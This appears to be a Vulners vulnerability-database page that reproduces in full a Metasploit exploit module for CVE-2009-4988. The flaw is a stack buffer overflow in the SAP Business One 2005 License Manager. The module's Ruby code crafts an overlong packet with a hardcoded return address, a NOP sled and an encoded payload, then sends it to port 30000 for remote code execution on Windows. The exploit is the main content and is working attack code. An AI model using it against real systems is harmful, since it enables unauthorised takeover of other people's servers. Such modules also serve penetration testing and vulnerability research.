Lucene search
K

SAP Business One License Manager 2005 Buffer Overflow

🗓️ 09 Sep 2009 15:01:25Reported by Jacopo CerviniType 
metasploit
 metasploit
🔗 www.rapid7.com👁 13 Views

SAP Business One 2005 License Manager Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-4988
1 Aug 200900:00
circl
Check Point Advisories
SAP Business One License Manager Buffer Overflow - Ver2 (CVE-2009-4988)
2 Jul 201800:00
checkpoint_advisories
CVE
CVE-2009-4988
25 Aug 201019:00
cve
Cvelist
CVE-2009-4988
25 Aug 201019:00
cvelist
Exploit DB
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
30 Nov 201000:00
exploitdb
Kaspersky
KLA10312 ACE vulnerability in SAP Business One 2005
25 Aug 201000:00
kaspersky
NVD
CVE-2009-4988
25 Aug 201020:00
nvd
Prion
Stack overflow
25 Aug 201020:00
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SAP Business One License Manager 2005 Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the SAP Business One 2005
          License Manager 'NT Naming Service' A and B releases. By sending an
          excessively long string the stack is overwritten enabling arbitrary
          code execution.
      },
      'Author'         => 'Jacopo Cervini',
      'References'     =>
        [
          [ 'OSVDB', '56837' ],
          [ 'CVE', '2009-4988' ],
          [ 'BID', '35933' ],
          [ 'EDB', '9319' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # aushack tested OK w2k3sp2 20090910
          [ 'Sap Business One 2005 B1 Universal', { 'Ret' => 0x00547b82 } ], # tao2005.dll push esp /ret
        ],
      'Privileged'     => true,
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2009-08-01'))

      register_options([Opt::RPORT(30000)])

  end

  def exploit
    connect

    sploit =  "\x47\x49\x4f\x50\x01\x00\x01\x00" + rand_text_english(1024)
    sploit << [target.ret].pack('V') # EIP for w2k3sp2 - jacopo (1024)
    sploit << [target.ret].pack('V') # EIP for w2k3sp0 - aushack (1028)
    sploit << make_nops(44) + payload.encoded + make_nops(384)

    print_status("Trying target #{target.name}...")
    sock.put(sploit)
    select(nil,nil,nil,1)

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation